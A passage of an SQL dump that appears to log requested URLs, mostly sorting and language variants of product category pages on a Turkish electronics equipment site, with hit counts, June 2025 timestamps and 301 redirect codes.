00:00:00',301),(42493,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:39:29','0000-00-00 00:00:00',301),(42494,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:39:31','0000-00-00 00:00:00',301),(42495,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:59:15','0000-00-00 00:00:00',301),(42496,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 09:59:16','0000-00-00 00:00:00',301),(42497,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-29 09:59:18','0000-00-00 00:00:00',301),(42498,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:20','0000-00-00 00:00:00',301),(42499,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 09:59:22','0000-00-00 00:00:00',301),(42500,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:59:24','0000-00-00 00:00:00',301),(42501,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:26','0000-00-00 00:00:00',301),(42502,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:28','0000-00-00 00:00:00',301),(42503,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-29 09:59:30','0000-00-00 00:00:00',301),(42504,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 09:59:32','0000-00-00 00:00:00',301),(42505,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:34','0000-00-00 00:00:00',301),(42506,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:36','0000-00-00 00:00:00',301),(42507,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-29 09:59:37','0000-00-00 00:00:00',301),(42508,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:39','0000-00-00 00:00:00',301),(42509,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 09:59:41','0000-00-00 00:00:00',301),(42510,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/ly-8c-detail',NULL,'','',1,0,'2025-06-29 09:59:43','0000-00-00 00:00:00',301),(42511,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 09:59:45','0000-00-00 00:00:00',301),(42512,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:47','0000-00-00 00:00:00',301),(42513,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 09:59:49','0000-00-00 00:00:00',301),(42514,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/am100-detail',NULL,'','',1,0,'2025-06-29 09:59:51','0000-00-00 00:00:00',301),(42515,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/am100-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 09:59:52','0000-00-00 00:00:00',301),(42516,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 09:59:54','0000-00-00 00:00:00',301),(42517,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 09:59:56','0000-00-00 00:00:00',301),(42518,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 09:59:58','0000-00-00 00:00:00',301),(42519,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:00','0000-00-00 00:00:00',301),(42520,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 10:00:02','0000-00-00 00:00:00',301),(42521,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 10:00:03','0000-00-00 00:00:00',301),(42522,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:05','0000-00-00 00:00:00',301),(42523,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:07','0000-00-00 00:00:00',301),(42524,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 10:00:08','0000-00-00 00:00:00',301),(42525,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 10:00:10','0000-00-00 00:00:00',301),(42526,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:12','0000-00-00 00:00:00',301),(42527,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:14','0000-00-00 00:00:00',301),(42528,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 10:00:15','0000-00-00 00:00:00',301),(42529,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:17','0000-00-00 00:00:00',301),(42530,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 10:00:19','0000-00-00 00:00:00',301),(42531,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 10:00:21','0000-00-00 00:00:00',301),(42532,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 10:00:22','0000-00-00 00:00:00',301),(42533,'http://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kaz?ma-milling',NULL,'','',1,0,'2025-06-29 11:12:48','0000-00-00 00:00:00',301),(42534,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:35','0000-00-00 00:00:00',301),(42535,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_sku',NULL,'','',1,0,'2025-06-29 11:17:36','0000-00-00 00:00:00',301),(42536,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:38','0000-00-00 00:00:00',301),(42537,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 11:17:40','0000-00-00 00:00:00',301),(42538,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:42','0000-00-00 00:00:00',301),(42539,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:44','0000-00-00 00:00:00',301),(42540,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n',NULL,'','',1,0,'2025-06-29 11:17:46','0000-00-00 00:00:00',301),(42541,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 11:17:47','0000-00-00 00:00:00',301),(42542,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 11:17:49','0000-00-00 00:00:00',301),(42543,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:51','0000-00-00 00:00:00',301),(42544,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:52','0000-00-00 00:00:00',301),(42545,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 11:17:54','0000-00-00 00:00:00',301),(42546,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:17:56','0000-00-00 00:00:00',301),(42547,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:58','0000-00-00 00:00:00',301),(42548,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:17:59','0000-00-00 00:00:00',301),(42549,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 11:18:01','0000-00-00 00:00:00',301),(42550,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:03','0000-00-00 00:00:00',301),(42551,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:05','0000-00-00 00:00:00',301),(42552,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:06','0000-00-00 00:00:00',301),(42553,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 11:18:08','0000-00-00 00:00:00',301),(42554,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:10','0000-00-00 00:00:00',301),(42555,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:11','0000-00-00 00:00:00',301),(42556,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:13','0000-00-00 00:00:00',301),(42557,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-29 11:18:15','0000-00-00 00:00:00',301),(42558,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:17','0000-00-00 00:00:00',301),(42559,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:19','0000-00-00 00:00:00',301),(42560,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:21','0000-00-00 00:00:00',301),(42561,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:22','0000-00-00 00:00:00',301),(42562,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:24','0000-00-00 00:00:00',301),(42563,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:26','0000-00-00 00:00:00',301),(42564,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 11:18:28','0000-00-00 00:00:00',301),(42565,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 11:18:29','0000-00-00 00:00:00',301),(42566,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:31','0000-00-00 00:00:00',301),(42567,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:33','0000-00-00 00:00:00',301),(42568,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:35','0000-00-00 00:00:00',301),(42569,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:36','0000-00-00 00:00:00',301),(42570,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:38','0000-00-00 00:00:00',301),(42571,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:40','0000-00-00 00:00:00',301),(42572,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 11:18:42','0000-00-00 00:00:00',301),(42573,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:43','0000-00-00 00:00:00',301),(42574,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:45','0000-00-00 00:00:00',301),(42575,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:47','0000-00-00 00:00:00',301),(42576,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:49','0000-00-00 00:00:00',301),(42577,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:50','0000-00-00 00:00:00',301),(42578,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:52','0000-00-00 00:00:00',301),(42579,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:54','0000-00-00 00:00:00',301),(42580,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 11:18:56','0000-00-00 00:00:00',301),(42581,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:18:57','0000-00-00 00:00:00',301),(42582,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:18:59','0000-00-00 00:00:00',301),(42583,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:01','0000-00-00 00:00:00',301),(42584,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 11:19:02','0000-00-00 00:00:00',301),(42585,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:19:04','0000-00-00 00:00:00',301),(42586,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:06','0000-00-00 00:00:00',301),(42587,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:08','0000-00-00 00:00:00',301),(42588,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-29 11:19:10','0000-00-00 00:00:00',301),(42589,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:11','0000-00-00 00:00:00',301),(42590,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 11:19:13','0000-00-00 00:00:00',301),(42591,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:15','0000-00-00 00:00:00',301),(42592,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:17','0000-00-00 00:00:00',301),(42593,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-29 11:19:18','0000-00-00 00:00:00',301),(42594,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 11:19:20','0000-00-00 00:00:00',301),(42595,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:22','0000-00-00 00:00:00',301),(42596,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:24','0000-00-00 00:00:00',301),(42597,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-29 11:19:26','0000-00-00 00:00:00',301),(42598,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 11:19:27','0000-00-00 00:00:00',301),(42599,'http://www.3s-technologies.com.tr/en/products/smd-ultra-h?z/npm-detail',NULL,'','',1,0,'2025-06-29 12:08:49','0000-00-00 00:00:00',301),(42600,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-d????k-h??zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 15:27:39','0000-00-00 00:00:00',301),(42601,'http://3s-technologies.com.tr/tr/blurbs.php',NULL,'','',33,0,'2025-06-29 17:00:07','0000-00-00 00:00:00',301),(42602,'http://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-y?kseklik-self-levelling',NULL,'','',1,0,'2025-06-29 17:25:19','0000-00-00 00:00:00',301),(42603,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 17:26:42','0000-00-00 00:00:00',301),(42604,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:26:43','0000-00-00 00:00:00',301),(42605,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n?language=en-gb',NULL,'','',1,0,'2025-06-29 17:26:45','0000-00-00 00:00:00',301),(42606,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??',NULL,'','',1,0,'2025-06-29 17:26:47','0000-00-00 00:00:00',301),(42607,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 17:26:49','0000-00-00 00:00:00',301),(42608,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 17:26:51','0000-00-00 00:00:00',301),(42609,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:26:53','0000-00-00 00:00:00',301),(42610,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:26:54','0000-00-00 00:00:00',301),(42611,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,category_name',NULL,'','',1,0,'2025-06-29 17:26:56','0000-00-00 00:00:00',301),(42612,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:26:58','0000-00-00 00:00:00',301),(42613,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:00','0000-00-00 00:00:00',301),(42614,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:02','0000-00-00 00:00:00',301),(42615,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 17:27:04','0000-00-00 00:00:00',301),(42616,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:05','0000-00-00 00:00:00',301),(42617,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:07','0000-00-00 00:00:00',301),(42618,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:09','0000-00-00 00:00:00',301),(42619,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,ordering',NULL,'','',1,0,'2025-06-29 17:27:11','0000-00-00 00:00:00',301),(42620,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:13','0000-00-00 00:00:00',301),(42621,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 17:27:15','0000-00-00 00:00:00',301),(42622,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:16','0000-00-00 00:00:00',301),(42623,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:18','0000-00-00 00:00:00',301),(42624,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:20','0000-00-00 00:00:00',301),(42625,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name',NULL,'','',1,0,'2025-06-29 17:27:22','0000-00-00 00:00:00',301),(42626,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:24','0000-00-00 00:00:00',301),(42627,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 17:27:26','0000-00-00 00:00:00',301),(42628,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:27','0000-00-00 00:00:00',301),(42629,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/cs40-detail',NULL,'','',1,0,'2025-06-29 17:27:29','0000-00-00 00:00:00',301),(42630,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/cs40-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:27:31','0000-00-00 00:00:00',301),(42631,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:33','0000-00-00 00:00:00',301),(42632,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:35','0000-00-00 00:00:00',301),(42633,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/le-40v-detail',NULL,'','',1,0,'2025-06-29 17:27:37','0000-00-00 00:00:00',301),(42634,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/le-40v-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:27:39','0000-00-00 00:00:00',301),(42635,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/ls60v-detail',NULL,'','',1,0,'2025-06-29 17:27:41','0000-00-00 00:00:00',301),(42636,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/ls60v-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:27:43','0000-00-00 00:00:00',301),(42637,'http://www.3s-technologies.com.tr/en/products/smd-d?????k-h??zl???language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:44','0000-00-00 00:00:00',301),(42638,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n',NULL,'','',1,0,'2025-06-29 17:27:46','0000-00-00 00:00:00',301),(42639,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 17:27:48','0000-00-00 00:00:00',301),(42640,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:50','0000-00-00 00:00:00',301),(42641,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:52','0000-00-00 00:00:00',301),(42642,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:54','0000-00-00 00:00:00',301),(42643,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:27:55','0000-00-00 00:00:00',301),(42644,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:57','0000-00-00 00:00:00',301),(42645,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:27:59','0000-00-00 00:00:00',301),(42646,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 17:28:01','0000-00-00 00:00:00',301),(42647,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 17:28:03','0000-00-00 00:00:00',301),(42648,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:05','0000-00-00 00:00:00',301),(42649,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:06','0000-00-00 00:00:00',301),(42650,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:08','0000-00-00 00:00:00',301),(42651,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/gf-12-hc-ht-detail',NULL,'','',1,0,'2025-06-29 17:28:10','0000-00-00 00:00:00',301),(42652,'http://www.3s-technologies.com.tr/en/products/smd-f?r??n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 17:28:12','0000-00-00 00:00:00',301),(42653,'http://www.3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 17:28:14','0000-00-00 